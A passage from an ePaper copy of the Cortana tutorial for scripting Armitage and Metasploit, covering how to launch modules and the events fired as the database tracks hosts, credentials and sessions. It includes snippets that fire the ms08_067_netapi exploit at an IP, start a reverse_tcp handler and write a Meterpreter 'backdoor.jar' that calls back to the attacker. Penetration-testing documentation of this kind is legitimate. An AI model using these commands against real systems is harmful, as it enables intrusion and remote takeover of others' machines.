Cortana Tutorial - Armitage

More documents

Recommendations

Info

The &modules function returns an array of modules of a particular type. This function also filters the list using a wildcard expression if you ask it to. Use the &options function to find the options associated with a particular module. The &info function provides extra information about a module. To launch a module (any module), use the &launch function. The following code launches the ms08_067_netapi module: launch("exploit", "windows/smb/ms08_067_netapi", %( RHOST => "192.168.95.166", PAYLOAD => "windows/meterpreter/bind_tcp")); The &launch function doesn't provide much help though. It launches a module of a particular type with the options you give it. Use &exploit to quickly launch an exploit module. This function will set a payload for you and take care of all the details. While there are several optional arguments, you may use &exploit with just two arguments to launch a fully configured exploit at a host. exploit("windows/smb/ms08_067_netapi", "192.168.95.166"); Use the &handler function to quickly start a multi/handler for a payload. A multi/handler waits for a payload to connect to it. The following example starts a multi/handler for java/meterpreter/reverse_tcp on port 81. handler("java/meterpreter/reverse_tcp", 81); Use the &generate function to generate a payload suitable for saving to a file. This example generates a Java meterpreter file and saves it to backdoor.jar. This file connects to the multi/handler we created in the previous example. $backdoor = generate("java/meterpreter/reverse_tcp", lhost(), 81, %(), "raw"); $handle = openf(">backdoor.jar"); writeb($handle, $backdoor); closef($handle); The &lhost function returns the IP address of the system hosting the Metasploit Framework. Data Management One of the gaps in the Metasploit API is a lack of documented methods to communicate with the database. Metasploit stores hosts, services, credentials, and a wealth of other data points in a database. Cortana transparently connects to the Metasploit database and regularly polls the known sessions, routes, hosts, services, loots, and credentials. 14
A snapshot of the database is always available to your script. When Cortana polls the database, it compares the new results to its understanding of the database. Cortana uses the changes in the database to fire events that you may register listeners for. Figure 3. Cotana's Data Management The host_add and host_delete events fire when hosts are added or deleted. Look at the &hosts_* functions to learn how to interact with and query hosts. Cortana also fires events for services. The services_add_n fires when a service with port n is first seen. The service_add event fires for any service and service_delete fires when a service disappears from the database. Take a look at the &service_* functions to learn how to interact with and query the known services. Cortana fires the credential_add event when a credential is added to the database. Metasploit automatically records working credentials as they're discovered. The credential_delete event is fired when a credential is removed from the database. The &credential_* functions let you query and manipulate the known credentials. The session_open event fires when a new session opens up. A session is an active connection between Metasploit and a compromised host. The session_close event fires when a session closes. When a Meterpreter session is ready for interaction, Cortana fires a session_sync event to indicate this. The &session_* functions provide tools to query or close any existing sessions. Cortana also fires a route_add event when a new pivot is setup. The route_delete event is fired when a pivot is removed. The &route_* functions let you add, delete, and query routes. The loot_add event fires when a new loot is added to the database. Some Metasploit post modules record their captured database as a loot entry. The main purpose of this event is 15
Page 1 and 2: Cortana Tutorial 16 Aug 12 Raphael
Page 3 and 4: Tables ............................
Page 5 and 6: Figure 1. Cortana Architecture Usin
Page 7 and 8: Command Arguments What it does asko
Page 9 and 10: an array containing all of the argu
Page 11 and 12: 2. Controlling Metasploit Hello Met
Page 13: Low-‐level Metasploit Control M
Page 17 and 18: 3. Post Exploitation Interacting wi
Page 19 and 20: Interacting with a Meterpreter Sess
Page 21 and 22: on exec_dir { # $3 now contains a b
Page 23 and 24: stores binary data in a string. So
Page 25 and 26: Spawning Cortana Instances Many Cor
Page 27 and 28: Some popup menus are created with a
Page 29 and 30: filter host_image { $address = $2['
Page 31 and 32: This value can be anything you desi
Page 33 and 34: prompt($console, "\Umeterpreter\U>
Page 35 and 36: By default, the table tab is empty.
Page 37 and 38: Next we declare an item_selected li
Page 39 and 40: heartbeat_30s A thirty second timer
Page 42 and 43: Appendix B. Cortana Filters Filter
Page 44 and 45: cmd_set $console, %options Adds sev
Page 46 and 47: host_add $address1, $address2, @add
Page 48 and 49: m_exec $sid, "command" m_exec_local
Page 50 and 51: containing dictionaries that descri
Page 52 and 53: $ session_exploit $sid Returns the
Page 54 and 55: Appendix D. Keyboard Shortcut Speci

Cortana Tutorial - Armitage

Create successful ePaper yourself

Delete template?

Save as template?